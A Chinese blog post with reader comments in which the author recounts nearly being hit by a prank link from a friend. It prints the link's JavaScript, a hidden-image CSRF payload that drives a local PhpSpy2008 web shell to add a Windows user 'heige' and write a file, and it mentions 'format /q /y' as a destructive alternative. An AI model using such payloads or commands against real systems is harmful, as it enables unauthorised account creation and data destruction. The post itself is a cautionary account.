被小黑吓了一把——差点被小黑加了个用户

事情起因:http://superhei.blogbus.com/logs/12289653.html

结论:以后对于小黑发的LINK一定要小心翼翼。要不然我的机器上就多了一个heige用户了。幸好我的COOKIE有问题。登陆任何论坛和博客。关闭浏览器就无效了。哪怕选了时效的。

小黑叫我看我的C盘有没有heige.txt的时候。我马上就把刚才小黑发的LINK的源代码看了一下。

JavaScript代码
  1. <script>   
  2. var url = 'http://localhost/phpspy/2008.php?action=shell&execfunc=system&command=net user heige heige /add|echo fuck >c:\\heige.txt';    
  3. getURL(url);   
  4. function getURL(s) {   
  5.     var image = new Image();   
  6.     image.style.width = 0;   
  7.     image.style.height = 0;   
  8.     image.src = s;   
  9. }   
  10. </script>  

上面的代码一看吓我一跳。因为我装的是APACHE套件的,所以服务还是SYSTEM权限运行的。如果不是我的COOKIE有问题。PHPSPY2008处于登陆状态。就被执行命令了。还好是小黑。如果是其他人狠一点的话。来一个format /q /y,那我都不知道找谁了。看来以后一定不能在网上暴露过多自己计算机的信息。

网络——危险无处不在。 

Tags: 攻击 , xss , csrf , phpspy

上一篇: CityFM-城市之音
下一篇: PhpSpy2008最终形态

相关文章

访客评论

  1. #1 lingfeng 2007-12-20, 8:23 AM
    果然够狠。。。。
  2. #2 rexsky 2007-12-20, 9:18 AM
    小黑果然不厚道..哈哈....小A,SA2.0什么时候出啊....还有就是url可以是标题吗???等2.0出来我做英文BLOG呢....加油啊...哈哈~~~
  3. #3 4mxku 2007-12-20, 10:44 AM
    还好像你不黑锅,要是的话,我就挂了。以后啊。。。。。
  4. #4 sun 2008-04-07, 2:25 AM
    我操,LINUX居然有fotmat 命令?
    還有MS的參數?
  5. #5 董金 2008-08-07, 2:08 PM
    我操,LINUX居然有fotmat 命令?
    還有MS的參數?
    ---------------------------
    4ngle 用的是 win

    权限分配很差

发表评论

评论内容 (必填):

点击获得Trackback地址
My E-mail